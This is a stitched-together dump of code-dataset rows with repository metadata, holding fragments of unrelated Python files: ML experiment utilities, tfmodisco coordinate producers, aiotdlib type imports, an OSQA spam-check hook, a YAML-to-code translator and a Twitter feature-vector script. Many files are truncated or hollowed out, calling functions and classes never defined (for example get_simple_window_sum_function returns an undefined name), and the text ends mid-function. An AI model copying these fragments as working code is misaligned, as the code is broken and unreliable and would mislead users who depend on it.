] | null | null | null | models/FedXXX/resnet_utils.py | TD21forever/QoS-Predcition-Algorithm-library | f4503462887d719a39c9ccddd6cc55546e783fd5 | [
"MIT"
] | null | null | null | from abc import get_cache_token
from collections import OrderedDict
from torch import nn
# short cut
# block
# resnetblock
# resnet layerencoder
if __name__ == "__main__":
m = ResNetEncoder()
print(get_parameter_number(m))
| 28.548673 | 91 | 0.614073 |
c04d90069f191974d0ed369a9c73406bd54fa0cc | 2,114 | py | Python | xblock/test/test_json_conversion.py | edly-io/XBlock | 60d01a32e5bfe1b543f598cbc56ba3f4d736129d | [
"Apache-2.0"
] | null | null | null | xblock/test/test_json_conversion.py | edly-io/XBlock | 60d01a32e5bfe1b543f598cbc56ba3f4d736129d | [
"Apache-2.0"
] | null | null | null | xblock/test/test_json_conversion.py | edly-io/XBlock | 60d01a32e5bfe1b543f598cbc56ba3f4d736129d | [
"Apache-2.0"
] | null | null | null | """
Tests asserting that ModelTypes convert to and from json when working
with ModelDatas
"""
# Allow inspection of private class members
# pylint: disable=protected-access
from mock import Mock
from xblock.core import XBlock
from xblock.fields import Field, Scope, ScopeIds
from xblock.field_data import DictFieldData
from xblock.test.tools import TestRuntime
| 28.186667 | 120 | 0.64333 |
c04dc0e5e93dcddb8cf11931aefe2f5bf4588f05 | 10,592 | py | Python | uq_benchmark_2019/experiment_utils.py | pedersor/google-research | 6fa751dd261b3f6d918fd2cd35efef5d8bf3eea6 | [
"Apache-2.0"
] | null | null | null | uq_benchmark_2019/experiment_utils.py | pedersor/google-research | 6fa751dd261b3f6d918fd2cd35efef5d8bf3eea6 | [
"Apache-2.0"
] | null | null | null | uq_benchmark_2019/experiment_utils.py | pedersor/google-research | 6fa751dd261b3f6d918fd2cd35efef5d8bf3eea6 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities to help set up and run experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os.path
from absl import logging
import numpy as np
import scipy.special
from six.moves import range
from six.moves import zip
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
gfile = tf.io.gfile
def save_model(model, output_dir):
"""Save Keras model weights and architecture as HDF5 file."""
save_path = '%s/model.hdf5' % output_dir
logging.info('Saving model to %s', save_path)
model.save(save_path, include_optimizer=False)
return save_path
def metrics_from_stats(stats):
"""Compute metrics to report to hyperparameter tuner."""
labels, probs = stats['labels'], stats['probs']
# Reshape binary predictions to 2-class.
if len(probs.shape) == 1:
probs = np.stack([1-probs, probs], axis=-1)
assert len(probs.shape) == 2
predictions = np.argmax(probs, axis=-1)
accuracy = np.equal(labels, predictions)
label_probs = probs[np.arange(len(labels)), labels]
log_probs = np.maximum(-1e10, np.log(label_probs))
brier_scores = np.square(probs).sum(-1) - 2 * label_probs
return {'accuracy': accuracy.mean(0),
'brier_score': brier_scores.mean(0),
'log_prob': log_probs.mean(0)}
def make_predictions(
model, batched_dataset, predictions_per_example=1, writers=None,
predictions_are_logits=True, record_image_samples=True, max_batches=1e6):
"""Build a dictionary of predictions for examples from a dataset.
Args:
model: Trained Keras model.
batched_dataset: tf.data.Dataset that yields batches of image, label pairs.
predictions_per_example: Number of predictions to generate per example.
writers: `dict` with keys 'small' and 'full', containing
array_utils.StatsWriter instances for full prediction results and small
prediction results (omitting logits).
predictions_are_logits: Indicates whether model outputs are logits or
probabilities.
record_image_samples: `bool` Record one batch of input examples.
max_batches: `int`, maximum number of batches.
Returns:
Dictionary containing:
labels: Labels copied from the dataset (shape=[N]).
logits_samples: Samples of model predict outputs for each example
(shape=[N, M, K]).
probs: Probabilities after averaging over samples (shape=[N, K]).
image_samples: One batch of input images (for sanity checking).
"""
if predictions_are_logits:
samples_key = 'logits_samples'
avg_probs_fn = lambda x: scipy.special.softmax(x, axis=-1).mean(-2)
else:
samples_key = 'probs_samples'
avg_probs_fn = lambda x: x.mean(-2)
labels, outputs = [], []
predict_fn = model.predict if hasattr(model, 'predict') else model
for i, (inputs_i, labels_i) in enumerate(tfds.as_numpy(batched_dataset)):
logging.info('iteration: %d', i)
outputs_i = np.stack(
[predict_fn(inputs_i) for _ in range(predictions_per_example)], axis=1)
if writers is None:
labels.extend(labels_i)
outputs.append(outputs_i)
else:
avg_probs_i = avg_probs_fn(outputs_i)
prediction_batch = dict(labels=labels_i, probs=avg_probs_i)
if i == 0 and record_image_samples:
prediction_batch['image_samples'] = inputs_i
writers['small'].write_batch(prediction_batch)
prediction_batch[samples_key] = outputs_i
writers['full'].write_batch(prediction_batch)
# Don't predict whole ImageNet training set
if i > max_batches:
break
if writers is None:
image_samples = inputs_i # pylint: disable=undefined-loop-variable
labels = np.stack(labels, axis=0)
outputs = np.concatenate(outputs, axis=0)
stats = {'labels': labels, 'image_samples': image_samples,
samples_key: outputs, 'probs': avg_probs_fn(outputs)}
if record_image_samples:
stats['image_samples'] = image_samples
return stats
def get_distribution_strategy(distribution_strategy='default',
num_gpus=0,
num_workers=1,
all_reduce_alg=None,
num_packs=1):
"""Return a DistributionStrategy for running the model.
Args:
distribution_strategy: a string specifying which distribution strategy to
use. Accepted values are 'off', 'default', 'one_device', 'mirrored',
'parameter_server', 'multi_worker_mirrored', case insensitive. 'off' means
not to use Distribution Strategy; 'default' means to choose from
`MirroredStrategy`, `MultiWorkerMirroredStrategy`, or `OneDeviceStrategy`
according to the number of GPUs and number of workers.
num_gpus: Number of GPUs to run this model.
num_workers: Number of workers to run this model.
all_reduce_alg: Optional. Specifies which algorithm to use when performing
all-reduce. For `MirroredStrategy`, valid values are 'nccl' and
'hierarchical_copy'. For `MultiWorkerMirroredStrategy`, valid values are
'ring' and 'nccl'. If None, DistributionStrategy will choose based on
device topology.
num_packs: Optional. Sets the `num_packs` in `tf.distribute.NcclAllReduce`
or `tf.distribute.HierarchicalCopyAllReduce` for `MirroredStrategy`.
Returns:
tf.distribute.DistibutionStrategy object.
Raises:
ValueError: if `distribution_strategy` is 'off' or 'one_device' and
`num_gpus` is larger than 1; or `num_gpus` is negative.
"""
if num_gpus < 0:
raise ValueError('`num_gpus` can not be negative.')
distribution_strategy = distribution_strategy.lower()
if distribution_strategy == 'off':
if num_gpus > 1:
raise ValueError(
'When {} GPUs and {} workers are specified, distribution_strategy '
'flag cannot be set to "off".'.format(num_gpus, num_workers))
return None
if distribution_strategy == 'multi_worker_mirrored':
return tf.distribute.experimental.MultiWorkerMirroredStrategy(
communication=_collective_communication(all_reduce_alg))
if (distribution_strategy == 'one_device' or
(distribution_strategy == 'default' and num_gpus <= 1)):
if num_gpus == 0:
return tf.distribute.OneDeviceStrategy('device:CPU:0')
else:
if num_gpus > 1:
raise ValueError('`OneDeviceStrategy` can not be used for more than '
'one device.')
return tf.distribute.OneDeviceStrategy('device:GPU:0')
if distribution_strategy in ('mirrored', 'default'):
if num_gpus == 0:
assert distribution_strategy == 'mirrored'
devices = ['device:CPU:0']
else:
devices = ['device:GPU:%d' % i for i in range(num_gpus)]
return tf.distribute.MirroredStrategy(
devices=devices,
cross_device_ops=_mirrored_cross_device_ops(all_reduce_alg, num_packs))
if distribution_strategy == 'parameter_server':
return tf.compat.v1.distribute.experimental.ParameterServerStrategy()
raise ValueError(
'Unrecognized Distribution Strategy: %r' % distribution_strategy)
def _collective_communication(all_reduce_alg):
"""Return a CollectiveCommunication based on all_reduce_alg.
Args:
all_reduce_alg: a string specifying which collective communication to pick,
or None.
Returns:
tf.distribute.experimental.CollectiveCommunication object
Raises:
ValueError: if `all_reduce_alg` not in [None, 'ring', 'nccl']
"""
collective_communication_options = {
None: tf.distribute.experimental.CollectiveCommunication.AUTO,
'ring': tf.distribute.experimental.CollectiveCommunication.RING,
'nccl': tf.distribute.experimental.CollectiveCommunication.NCCL
}
if all_reduce_alg not in collective_communication_options:
raise ValueError(
'When used with `multi_worker_mirrored`, valid values for '
'all_reduce_alg are ["ring", "nccl"]. Supplied value: {}'.format(
all_reduce_alg))
return collective_communication_options[all_reduce_alg]
def _mirrored_cross_device_ops(all_reduce_alg, num_packs):
"""Return a CrossDeviceOps based on all_reduce_alg and num_packs.
Args:
all_reduce_alg: a string specifying which cross device op to pick, or None.
num_packs: an integer specifying number of packs for the cross device op.
Returns:
tf.distribute.CrossDeviceOps object or None.
Raises:
ValueError: if `all_reduce_alg` not in [None, 'nccl', 'hierarchical_copy'].
"""
if all_reduce_alg is None:
return None
mirrored_all_reduce_options = {
'nccl': tf.distribute.NcclAllReduce,
'hierarchical_copy': tf.distribute.HierarchicalCopyAllReduce
}
if all_reduce_alg not in mirrored_all_reduce_options:
raise ValueError(
'When used with `mirrored`, valid values for all_reduce_alg are '
'["nccl", "hierarchical_copy"]. Supplied value: {}'.format(
all_reduce_alg))
cross_device_ops_class = mirrored_all_reduce_options[all_reduce_alg]
return cross_device_ops_class(num_packs=num_packs)
| 36.273973 | 80 | 0.715823 |
c04f13b9a712c28cf890f8bd241f887d6602c688 | 42,844 | py | Python | modisco/coordproducers.py | Bluedragon137/tfmodisco | d7c56b21e1bb58b07695ef3035f173b7d1a039e6 | [
"MIT"
] | null | null | null | modisco/coordproducers.py | Bluedragon137/tfmodisco | d7c56b21e1bb58b07695ef3035f173b7d1a039e6 | [
"MIT"
] | null | null | null | modisco/coordproducers.py | Bluedragon137/tfmodisco | d7c56b21e1bb58b07695ef3035f173b7d1a039e6 | [
"MIT"
] | null | null | null | from __future__ import division, print_function, absolute_import
from .core import SeqletCoordinates
from modisco import util
import numpy as np
from collections import defaultdict, Counter, OrderedDict
import itertools
import sys
import time
from .value_provider import (
AbstractValTransformer, AbsPercentileValTransformer,
SignedPercentileValTransformer, PrecisionValTransformer)
import scipy
from sklearn.isotonic import IsotonicRegression
SUBSAMPLE_CAP = 1000000
#The only parts of TransformAndThresholdResults that are used in
# TfModiscoWorkflow are the transformed_pos/neg_thresholds and the
# val_transformer (used in metaclustering with multiple tasks)
#TransformAndThresholdResults are also used to be
# able to replicate the same procedure used for identifying coordinates as
# when TfMoDisco was first run; the information needed in that case would
# be specific to the type of Coordproducer used
#FWAC = FixedWindowAroundChunks; this TransformAndThresholdResults object
# is specific to the type of info needed in that case.
def get_simple_window_sum_function(window_size):
return window_sum_function
def get_null_vals(null_track, score_track, window_size,
original_summed_score_track):
if (hasattr(null_track, '__call__')):
null_vals = null_track(
score_track=score_track,
window_size=window_size,
original_summed_score_track=original_summed_score_track)
else:
window_sum_function = get_simple_window_sum_function(window_size)
null_summed_score_track = window_sum_function(arrs=null_track)
null_vals = list(np.concatenate(null_summed_score_track, axis=0))
return null_vals
def subsample_if_large(arr):
if (len(arr) > SUBSAMPLE_CAP):
print("Subsampling!")
sys.stdout.flush()
arr = np.random.RandomState(1234).choice(a=arr, size=SUBSAMPLE_CAP,
replace=False)
return arr
def irval_to_probpos(irval, frac_neg):
#n(x):= pdf of null dist (negatives)
#p(x):= pdf of positive distribution
#f_p:= fraction of positives
#f_n:= fraction of negatives = 1-f_p
#o(x):= pdf of observed distribution = n(x)f_n + p(x)f_p
#The isotonic regression produces a(x) = o(x)/[o(x) + n(x)]
# o(x)/[o(x) + n(x)] = [n(x)f_n + o(x)f_p]/[n(x)(1+f_n) + p(x)]
# a(x)[n(x)(1+f_n) + p(x)f_p] = n(x)f_n + p(x)f_p
# a(x)n(x)(1+f_n) - n(x)f_n = p(x)f_p - a(x)p(x)f_p
# n(x)[a(x)(1+f_n) - f_n] = p(x)f_p[1 - a(x)]
# [a(x)/f_n + (a(x)-1)]/[1-a(x)] = (p(x)f_p)/(n(x)f_n) = r(x)
#p_pos = 1 / (1 + 1/r(x))
# = [a(x)/f_n + (a(x)-1)]/[a(x)/f_n + (a(x)-1) + (1-a(x))]
# = [a(x)/f_n + a(x)-1]/[a(x)/f_n]
# = [a(x) + f_n(a(x)-1)]/a(x)
# = 1 + f_n(a(x)-1)/a(x)
# = 1 + f_n(1 - 1/a(x))
#If solving for p_pos=0, we have -1/(1 - 1/a(x)) = f_n
#As f_n --> 100%, p_pos --> 2 - 1/a(x); this assumes max(a(x)) = 0.5
return np.minimum(np.maximum(1 + frac_neg*(
1 - (1/np.maximum(irval,1e-7))), 0.0), 1.0)
#sliding in this case would be a list of values
#identify_coords is expecting something that has already been processed
# with sliding windows of size window_size
def identify_coords(score_track, pos_threshold, neg_threshold,
window_size, flank, suppress,
max_seqlets_total, verbose, other_info_tracks={}):
for other_info_track in other_info_tracks.values():
assert all([x.shape==y.shape for x,y
in zip(other_info_track,score_track)])
#cp_score_track = 'copy' of the score track, which can be modified as
# coordinates are identified
cp_score_track = [np.array(x) for x in score_track]
#if a position is less than the threshold, set it to -np.inf
#Note that the threshold comparisons need to be >= and not just > for
# cases where there are lots of ties at the high end (e.g. with an IR
# tranformation that gives a lot of values that have a precision of 1.0)
cp_score_track = [
np.array([np.abs(y) if (y >= pos_threshold
or y <= neg_threshold)
else -np.inf for y in x])
for x in cp_score_track]
coords = []
for example_idx,single_score_track in enumerate(cp_score_track):
#set the stuff near the flanks to -np.inf so that we
# don't pick it up during argmax
single_score_track[0:flank] = -np.inf
single_score_track[len(single_score_track)-(flank):
len(single_score_track)] = -np.inf
while True:
argmax = np.argmax(single_score_track,axis=0)
max_val = single_score_track[argmax]
#bail if exhausted everything that passed the threshold
#and was not suppressed
if (max_val == -np.inf):
break
#need to be able to expand without going off the edge
if ((argmax >= flank) and
(argmax < (len(single_score_track)-flank))):
coord = SeqletCoordsFWAP(
example_idx=example_idx,
start=argmax-flank,
end=argmax+window_size+flank,
score=score_track[example_idx][argmax],
other_info = dict([
(track_name, track[example_idx][argmax])
for (track_name, track) in other_info_tracks.items()]))
assert (coord.score >= pos_threshold
or coord.score <= neg_threshold)
coords.append(coord)
else:
assert False,\
("This shouldn't happen because I set stuff near the"
"border to -np.inf early on")
#suppress the chunks within +- suppress
left_supp_idx = int(max(np.floor(argmax+0.5-suppress),0))
right_supp_idx = int(min(np.ceil(argmax+0.5+suppress),
len(single_score_track)))
single_score_track[left_supp_idx:right_supp_idx] = -np.inf
if (verbose):
print("Got "+str(len(coords))+" coords")
sys.stdout.flush()
if ((max_seqlets_total is not None) and
len(coords) > max_seqlets_total):
if (verbose):
print("Limiting to top "+str(max_seqlets_total))
sys.stdout.flush()
coords = sorted(coords, key=lambda x: -np.abs(x.score))\
[:max_seqlets_total]
return coords
def refine_thresholds_based_on_frac_passing(
vals, pos_threshold, neg_threshold,
min_passing_windows_frac, max_passing_windows_frac,
separate_pos_neg_thresholds, verbose):
frac_passing_windows =(
sum(vals >= pos_threshold)
+ sum(vals <= neg_threshold))/float(len(vals))
if (verbose):
print("Thresholds from null dist were",
neg_threshold," and ",pos_threshold,
"with frac passing", frac_passing_windows)
pos_vals = [x for x in vals if x >= 0]
neg_vals = [x for x in vals if x < 0]
#deal with edge case of len < 0
pos_vals = [0] if len(pos_vals)==0 else pos_vals
neg_vals = [0] if len(neg_vals)==0 else neg_vals
#adjust the thresholds if the fall outside the min/max
# windows frac
if (frac_passing_windows < min_passing_windows_frac):
if (verbose):
print("Passing windows frac was",
frac_passing_windows,", which is below ",
min_passing_windows_frac,"; adjusting")
if (separate_pos_neg_thresholds):
pos_threshold = np.percentile(
a=pos_vals,
q=100*(1-min_passing_windows_frac))
neg_threshold = np.percentile(
a=neg_vals,
q=100*(min_passing_windows_frac))
else:
pos_threshold = np.percentile(
a=np.abs(vals),
q=100*(1-min_passing_windows_frac))
neg_threshold = -pos_threshold
if (frac_passing_windows > max_passing_windows_frac):
if (verbose):
print("Passing windows frac was",
frac_passing_windows,", which is above ",
max_passing_windows_frac,"; adjusting")
if (separate_pos_neg_thresholds):
pos_threshold = np.percentile(
a=pos_vals,
q=100*(1-max_passing_windows_frac))
neg_threshold = np.percentile(
a=neg_vals,
q=100*(max_passing_windows_frac))
else:
pos_threshold = np.percentile(
a=np.abs(vals),
q=100*(1-max_passing_windows_frac))
neg_threshold = -pos_threshold
if (verbose):
print("New thresholds are",pos_threshold,"and",neg_threshold)
return pos_threshold, neg_threshold
def make_nulldist_figure(orig_vals, null_vals, pos_ir, neg_ir,
pos_threshold, neg_threshold):
from matplotlib import pyplot as plt
fig,ax1 = plt.subplots()
orig_vals = np.array(sorted(orig_vals))
ax1.hist(orig_vals, bins=100, density=True, alpha=0.5)
ax1.hist(null_vals, bins=100, density=True, alpha=0.5)
ax1.set_ylabel("Probability density\n(blue=foreground, orange=null)")
ax1.set_xlabel("Total importance in window")
precisions = pos_ir.transform(orig_vals)
if (neg_ir is not None):
precisions = np.maximum(precisions, neg_ir.transform(orig_vals))
ax2 = ax1.twinx()
ax2.plot(orig_vals, precisions)
if (pos_threshold is not None):
ax2.plot([pos_threshold, pos_threshold], [0.0, 1.0], color="red")
if (neg_threshold is not None):
ax2.plot([neg_threshold, neg_threshold], [0.0, 1.0], color="red")
ax2.set_ylabel("Estimated foreground precision")
ax2.set_ylim(0.0, 1.02)
| 42.294176 | 80 | 0.618336 |
c04f8c1ca8657a2985f474bb739ac4de154e1a01 | 425 | py | Python | Google Jam/2016/lastword.py | djphan/Prog-Problems | db79d76f8a40e844c8cc61b3df2c0d52737ee9e4 | [
"MIT"
] | null | null | null | Google Jam/2016/lastword.py | djphan/Prog-Problems | db79d76f8a40e844c8cc61b3df2c0d52737ee9e4 | [
"MIT"
] | null | null | null | Google Jam/2016/lastword.py | djphan/Prog-Problems | db79d76f8a40e844c8cc61b3df2c0d52737ee9e4 | [
"MIT"
] | null | null | null | import sys
numTests = input()
for i in range (0, int(numTests)):
print ("Case #" + str(i+1) +": " + str(lastWord(input())))
| 25 | 100 | 0.647059 |
c04ff3ada5e9e3495ef3e426dee60d1388e47451 | 62,817 | py | Python | aiotdlib/api/types/update.py | pylakey/pytdlib | a390a298a24a7123f3f3aec9f995dee6d51a478e | [
"MIT"
] | 37 | 2021-05-04T10:41:41.000Z | 2022-03-30T13:48:05.000Z | aiotdlib/api/types/update.py | pylakey/pytdlib | a390a298a24a7123f3f3aec9f995dee6d51a478e | [
"MIT"
] | 13 | 2021-07-17T19:54:51.000Z | 2022-02-26T06:50:00.000Z | aiotdlib/api/types/update.py | pylakey/pytdlib | a390a298a24a7123f3f3aec9f995dee6d51a478e | [
"MIT"
] | 7 | 2021-09-22T21:27:11.000Z | 2022-02-20T02:33:19.000Z | # =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
import typing
from pydantic import Field
from .address import Address
from .authorization_state import AuthorizationState
from .background import Background
from .basic_group import BasicGroup
from .basic_group_full_info import BasicGroupFullInfo
from .call import Call
from .callback_query_payload import CallbackQueryPayload
from .chat import Chat
from .chat_action import ChatAction
from .chat_action_bar import ChatActionBar
from .chat_filter_info import ChatFilterInfo
from .chat_invite_link import ChatInviteLink
from .chat_join_request import ChatJoinRequest
from .chat_join_requests_info import ChatJoinRequestsInfo
from .chat_list import ChatList
from .chat_member import ChatMember
from .chat_nearby import ChatNearby
from .chat_notification_settings import ChatNotificationSettings
from .chat_permissions import ChatPermissions
from .chat_photo_info import ChatPhotoInfo
from .chat_position import ChatPosition
from .chat_theme import ChatTheme
from .chat_type import ChatType
from .connection_state import ConnectionState
from .draft_message import DraftMessage
from .file import File
from .group_call import GroupCall
from .group_call_participant import GroupCallParticipant
from .language_pack_string import LanguagePackString
from .location import Location
from .message import Message
from .message_content import MessageContent
from .message_interaction_info import MessageInteractionInfo
from .message_sender import MessageSender
from .notification import Notification
from .notification_group import NotificationGroup
from .notification_group_type import NotificationGroupType
from .notification_settings_scope import NotificationSettingsScope
from .option_value import OptionValue
from .order_info import OrderInfo
from .poll import Poll
from .reply_markup import ReplyMarkup
from .scope_notification_settings import ScopeNotificationSettings
from .secret_chat import SecretChat
from .sticker import Sticker
from .sticker_set import StickerSet
from .sticker_sets import StickerSets
from .suggested_action import SuggestedAction
from .supergroup import Supergroup
from .supergroup_full_info import SupergroupFullInfo
from .terms_of_service import TermsOfService
from .user import User
from .user_full_info import UserFullInfo
from .user_privacy_setting import UserPrivacySetting
from .user_privacy_setting_rules import UserPrivacySettingRules
from .user_status import UserStatus
from .video_chat import VideoChat
from ..base_object import BaseObject
| 29.203626 | 318 | 0.692711 |
c0507144735d0e0532afa021b9f51f1bb1e7c543 | 3,908 | py | Python | lib/tests/test_integration.py | OneIdentity/safeguard-sessions-plugin-cyberark-vault | 34f8c7a826b6b89c3c9a649b5395798263b4077f | [
"MIT"
] | null | null | null | lib/tests/test_integration.py | OneIdentity/safeguard-sessions-plugin-cyberark-vault | 34f8c7a826b6b89c3c9a649b5395798263b4077f | [
"MIT"
] | 3 | 2020-08-07T10:41:44.000Z | 2021-01-27T08:56:57.000Z | lib/tests/test_integration.py | OneIdentity/safeguard-sessions-plugin-cyberark-vault | 34f8c7a826b6b89c3c9a649b5395798263b4077f | [
"MIT"
] | null | null | null | #
# Copyright (c) 2019 One Identity
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
import pytest
from textwrap import dedent
from ..plugin import Plugin
from safeguard.sessions.plugin_impl.test_utils.plugin import assert_plugin_hook_result
| 36.185185 | 139 | 0.753327 |
c050754add3acb4ba8ba228383257d1e46d1352d | 2,997 | py | Python | forum_modules/akismet/startup.py | Stackato-Apps/osqa | 728bb43ae913e33769c52f40cadb26721faaf2b2 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 1 | 2017-07-14T09:58:07.000Z | 2017-07-14T09:58:07.000Z | forum_modules/akismet/startup.py | Stackato-Apps/osqa | 728bb43ae913e33769c52f40cadb26721faaf2b2 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | forum_modules/akismet/startup.py | Stackato-Apps/osqa | 728bb43ae913e33769c52f40cadb26721faaf2b2 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | import json
from django.utils.translation import ugettext as _
from django.http import HttpResponse, HttpResponseRedirect
from django.template import RequestContext
from django.utils.encoding import smart_str
from django.shortcuts import render_to_response
from forum.modules import decorate
from forum import views
from lib.akismet import Akismet
from forum.settings import APP_URL, OSQA_VERSION
from settings import WORDPRESS_API_KEY, REP_FOR_NO_SPAM_CHECK
from forum.models.user import User
from forum.forms.general import SimpleCaptchaForm
import settings
decorate(views.writers.ask)(check_spam('text', _('question')))
decorate(views.writers.answer)(check_spam('text', _('answer')))
decorate(views.commands.comment)(check_spam('comment', _('comment')))
| 38.423077 | 129 | 0.610944 |
c051e45b01f5963f9aee4c9d0f6e2146b9de7aad | 7,077 | py | Python | prototype/python/element_translator.py | doanminhdang/YAML_MATH | 4a95ae26ccd36de9a2c148f4ac1246f3cf0372f8 | [
"MIT"
] | 1 | 2019-06-29T16:54:59.000Z | 2019-06-29T16:54:59.000Z | prototype/python/element_translator.py | doanminhdang/YAML_MATH | 4a95ae26ccd36de9a2c148f4ac1246f3cf0372f8 | [
"MIT"
] | null | null | null | prototype/python/element_translator.py | doanminhdang/YAML_MATH | 4a95ae26ccd36de9a2c148f4ac1246f3cf0372f8 | [
"MIT"
] | null | null | null | """
Translate an element, which is described by the YAML method file
and a descriptor file, into a target function.
Procedure:
1. When analyzing a YAML file, parse the call to the method-element, to get:
- list of inputs,
- list of outputs
2. Parse the YAML of that element, to know the name of the inputs and outputs,
create inputs and outputs with such names, value are translated-names (string,
given by the name-allocator before translating methods), they will be accessed
in the descriptor of that element.
3. Process the descriptor:
- If preprocess part is available: execute the preprocess part as Python 3 code.
- Treat the code part as text (a string), parse that text to detect:
anywhere there is the structure <var_name>, then replace it with the value
of that variable currently in Python memory (within scope of processing that
specific descriptor). The new text after processing the code part is named code.
- If postprocess part is available: execute the postprocess part as Python 3
code. By requirement, at the end of postprocess part, there will be a variables
named `code`. Write the value of `code` into the output string.
"""
import re
from . import descriptor_parser
from . import utils
from .shared_parameters import *
# def descriptor_file_parse(descriptor_file, method_file):
# descriptor = descriptor_file_read(descriptor_file)
# yaml_method = yaml_method_file_read(method_file)
# preprocess_parse(descriptor_file)
def yaml_single_method_file_read(yaml_method_file):
"""
Read a method file which contains only one block
"""
yaml_block = utils.yaml_file_read(yaml_method_file)
# Analyze its commands
return
def analyze_inputs(input_names, element_inputs):
"""
Get decoded names from the input_names (list) and the template
element_inputs (odict).
The output is a dict, with keys from element_inputs and values are picked
with corresponding order from input_names.
If element_inputs contains both 'name' and 'array_name', then array_name
must be the last item. This function automatically assign the rest of the
input names into an array, if 'array_name' is found in element_inputs.
"""
real_inputs = {}
index_input_names = 0
for item in element_inputs:
# item == OrderedDict([('array_name', 'input_'), ('length', ''), ('type', 'float')])
if 'name' in item:
real_inputs.update({item['name']: input_names[index_input_names]})
index_input_names += 1
elif 'array_name' in item:
names_left = input_names[index_input_names:]
array_length = len(names_left)
real_inputs.update({item['array_name']: names_left})
# for k in range(array_length):
# real_inputs.update({item['array_name'] + '[' + str(k) + ']': names_left[k]})
return real_inputs
def parse_code(code_string):
"""
Parse the multi-line string which contains the code, pick variable in <>.
Output: list of segments, each is a dict with key `text` or `var`,
and value is the text or the variable name.
"""
code = []
var_pattern = r'\<[\w\[\]]+\>'
rolling_code = code_string
while re.search(var_pattern, rolling_code):
start_index = re.search(var_pattern, rolling_code).start()
var_group = re.search(var_pattern, rolling_code).group()
var_name = var_group.strip('<>')
if start_index > 0:
text_before = rolling_code[0:start_index]
code.append({'text': text_before})
code.append({'var': var_name})
rolling_code = rolling_code[start_index+len(var_group):]
return code
def translate_single_code(input_dict, output_dict, preprocess_string,\
code_string, postprocess_string):
"""
input_dict == {'input_': ['A_1', 'A_2', 'A_3']}
output_dict == {'output': 'Alpha'}
parsed_code == [{'var': 'output'}, {'text': ' := '}, {'var': 'command_text'}]
"""
_code_series = parse_code(code_string)
print('preprocess:')
print(preprocess_string)
print('code:')
print(code_string)
print('postprocess:')
print(postprocess_string)
for _key in input_dict:
if isinstance(input_dict[_key], list):
# it is an array
_assign_code = _key + '=' + '['
for _item in input_dict[_key]:
_assign_code += '\'' + _item + '\','
_assign_code = _assign_code[:-1]+']' # remove the last comma
else:
_assign_code = _key + '=' + '\'' + input_dict[_key] + '\''
exec(_assign_code)
for _key in output_dict:
_assign_code = _key + '=' + '\'' + output_dict[_key] + '\''
exec(_assign_code)
exec(preprocess_string)
# 1st round: substitute variable names in code string
_1st_processed_code = ''
for _chunk in _code_series:
if 'text' in _chunk:
_1st_processed_code += _chunk['text']
if 'var' in _chunk:
_1st_processed_code += eval(_chunk['var'])
#2nd round: replace variable names left, which might come from preprocess,
# like: input_[0]
_parsed_2nd_code = parse_code(_1st_processed_code)
code = ''
for _chunk in _parsed_2nd_code:
if 'text' in _chunk:
code += _chunk['text']
if 'var' in _chunk:
code += eval(_chunk['var'])
# Preset output code, in case postprocess part is empty
exec(output_code_descriptor + ' = code')
# BUG: if output_code_descriptor is 'code', there is a Python bug that
# variable code is not updated after the next exec
exec(postprocess_string)
final_processed_code = eval(output_code_descriptor)
return final_processed_code
| 39.758427 | 94 | 0.687014 |
c0549485e176a6b48bb54cda44e0d335364d8ccb | 16,351 | py | Python | build_feature_vectors_32.py | weberdc/find_hccs | 43fcb151901f48765ea8e4ccf0b82dbb726762a3 | [
"Apache-2.0"
] | 7 | 2020-10-23T20:41:30.000Z | 2021-11-20T14:00:25.000Z | build_feature_vectors_32.py | weberdc/find_hccs | 43fcb151901f48765ea8e4ccf0b82dbb726762a3 | [
"Apache-2.0"
] | 5 | 2020-11-25T00:29:43.000Z | 2021-11-01T02:15:29.000Z | build_feature_vectors_32.py | weberdc/find_hccs | 43fcb151901f48765ea8e4ccf0b82dbb726762a3 | [
"Apache-2.0"
] | 2 | 2021-05-31T06:51:08.000Z | 2022-02-09T13:55:18.000Z | #!/usr/bin/env python3
import csv
import gzip
import json
import networkx as nx
import sys
import time
import utils
from argparse import ArgumentParser
from calculate_activity_network import embedded_extended_tweet_url, root_of_conversation
from collections import defaultdict
from datetime import datetime
from utils import eprint, expanded_urls_from, extract_text, flatten, lowered_hashtags_from, mentioned_ids_from#, timestamp_2_epoch_seconds
# Builds feature vectors for HCC members and their groupings as input to the
# classifiers for validation
#
# This version extracts 32 features
#
# Renamed from extract_feature_vectors_for_hcc_classifier.py
TWITTER_TS_FORMAT = '%a %b %d %H:%M:%S +0000 %Y' # Tue Apr 26 08:57:55 +0000 2011
def root_of_conversation(tweet_in_conversation, tweet_map):
"""Finds the root of the conversation that the provided tweet is in"""
root_id = tweet_in_conversation
